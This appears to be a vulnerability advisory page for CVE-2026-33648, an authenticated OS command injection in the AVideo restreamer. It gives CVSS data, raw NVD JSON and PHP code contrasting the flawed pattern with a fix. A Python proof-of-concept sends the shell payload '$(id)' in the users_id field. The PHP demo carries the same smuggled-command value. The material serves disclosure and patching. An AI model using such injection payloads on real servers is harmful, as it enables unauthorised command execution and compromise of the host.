Security Vulnerability Report
CVE-2026-33648 CVSS 8.8 HIGH

CVE-2026-33648

Published: 2026-03-23 19:16:41
Last Modified: 2026-03-25 17:55:17

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch.
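The pattern the description names, beside a hardened form, as an added illustration written for this page. It is not AVideo's code: the function names, the log directory and the ffmpeg command line are hypothetical, and the command string is returned rather than passed to `exec()` so the example can be run safely. What is taken from the advisory is the shape of the bug: two ids from the JSON body are interpolated into a log path, and that path is then spliced into a shell command string, so `$(id)` in `users_id` is expanded by the shell that `exec()` spawns.

```php
<?php
// Added example, not AVideo's code. Names and the ffmpeg command line are hypothetical;
// the vulnerable shape (user-supplied ids -> log path -> shell command) is the advisory's.

// --- Vulnerable pattern ---------------------------------------------------
// The ids arrive from the JSON body and are interpolated verbatim.
function buildLogPathUnsafe(array $json, string $logDir): string
{
    return "{$logDir}/restream_{$json['users_id']}_{$json['liveTransmitionHistory_id']}.log";
}

function runRestreamerUnsafe(array $json, string $logDir): string
{
    $logPath = buildLogPathUnsafe($json, $logDir);
    // The path lands inside a shell command string. With users_id = "$(id)" the shell
    // runs `id` before redirecting output. In the real code this string reaches exec().
    return "nohup ffmpeg -i input.m3u8 -f flv rtmp://example/live > {$logPath} 2>&1 &";
}

// --- Hardened form --------------------------------------------------------
// Root-cause fix: the ids are database keys, so accept only positive integers.
function safeId($value): int
{
    if (!is_int($value) && !(is_string($value) && ctype_digit($value))) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $id = (int) $value;
    if ($id <= 0) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    return $id;
}

function buildLogPathSafe(array $json, string $logDir): string
{
    $usersId = safeId($json['users_id'] ?? null);
    $histId  = safeId($json['liveTransmitionHistory_id'] ?? null);
    return sprintf('%s/restream_%d_%d.log', $logDir, $usersId, $histId);
}

function runRestreamerSafe(array $json, string $logDir): string
{
    $logPath = buildLogPathSafe($json, $logDir);
    // escapeshellarg() is defence in depth: after the integer check the path holds no
    // metacharacters, but quoting means a later change to $logDir cannot reintroduce injection.
    return 'nohup ffmpeg -i input.m3u8 -f flv rtmp://example/live > '
        . escapeshellarg($logPath) . ' 2>&1 &';
}

// --- Demo with constructed request bodies --------------------------------
$malicious = json_decode('{"users_id":"$(id)","liveTransmitionHistory_id":"1"}', true);
$benign    = json_decode('{"users_id":"42","liveTransmitionHistory_id":"7"}', true);
$logDir    = '/var/www/html/videos'; // hypothetical

echo "unsafe : " . runRestreamerUnsafe($malicious, $logDir) . PHP_EOL; // $(id) survives verbatim
echo "safe   : " . runRestreamerSafe($benign, $logDir) . PHP_EOL;
try {
    runRestreamerSafe($malicious, $logDir);
} catch (InvalidArgumentException $e) {
    echo "safe   : rejected (" . $e->getMessage() . ")" . PHP_EOL;
}
```

The integer check is the fix that matters; `escapeshellarg()` alone would also neutralise `$(id)` in the path, but it leaves the code one refactor away from the same bug. Where the shell is not needed at all, `proc_open()` with an array command (PHP 7.4 and later) runs the binary directly and removes the shell interpretation step entirely.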

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-78 (Improper Neutralization of Special Elements used in an OS Command)

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (example; the real login and restreamer endpoints are not named in the advisory)
target_url = "http://localhost/AVideo/plugin/REST/RESTServer.php"

# Login credentials (low-privilege user required)
login_payload = {
    "user": "attacker",
    "pass": "password"
}

# 1. Authenticate to get a session/cookie
session = requests.Session()
login_resp = session.post(target_url, data=login_payload)

if "success" in login_resp.text:
    print("[+] Login successful")

    # 2. Prepare the malicious payload
    # The vulnerability is in 'users_id' and 'liveTransmitionHistory_id'.
    # We inject shell metacharacters to execute the 'id' command.
    # Payload: $(id) or `id`
    injection_payload = "$(id)"

    exploit_data = {
        "users_id": injection_payload,
        "liveTransmitionHistory_id": "1",
        "action": "restreamer"  # Assumption: this parameter reaches the vulnerable endpoint logic
    }

    headers = {"Content-Type": "application/json"}

    # 3. Send the exploit request
    print(f"[*] Sending payload with users_id: {injection_payload}")
    exploit_resp = session.post(target_url, json=exploit_data, headers=headers)

    # 4. Check the response or server state for the command execution result
    #    (the injected command runs as part of a log path, so its output need not
    #    appear in the HTTP response; an out-of-band check is often needed)
    print(f"[*] Response received (HTTP {exploit_resp.status_code}):")
    print(exploit_resp.text)
else:
    print("[-] Login failed")

References

https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678 (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33648",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T19:16:40.907",
    "lastModified": "2026-03-25T17:55:16.970",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch."
      },
      {
        "lang": "es",
        "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el endpoint del restreamer construye una ruta de archivo de registro incrustando valores controlados por el usuario `users_id` y `liveTransmitionHistory_id` del cuerpo de la solicitud JSON sin ninguna sanitización. Esta ruta de archivo de registro se concatena luego directamente en comandos de shell pasados a `exec()`, permitiendo a un usuario autenticado lograr la ejecución arbitraria de comandos en el servidor a través de metacaracteres de shell como `$()` o comillas invertidas. El commit 99b865413172045fef6a98b5e9bfc7b24da11678 contiene un parche."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-78"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "26.0",
                "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}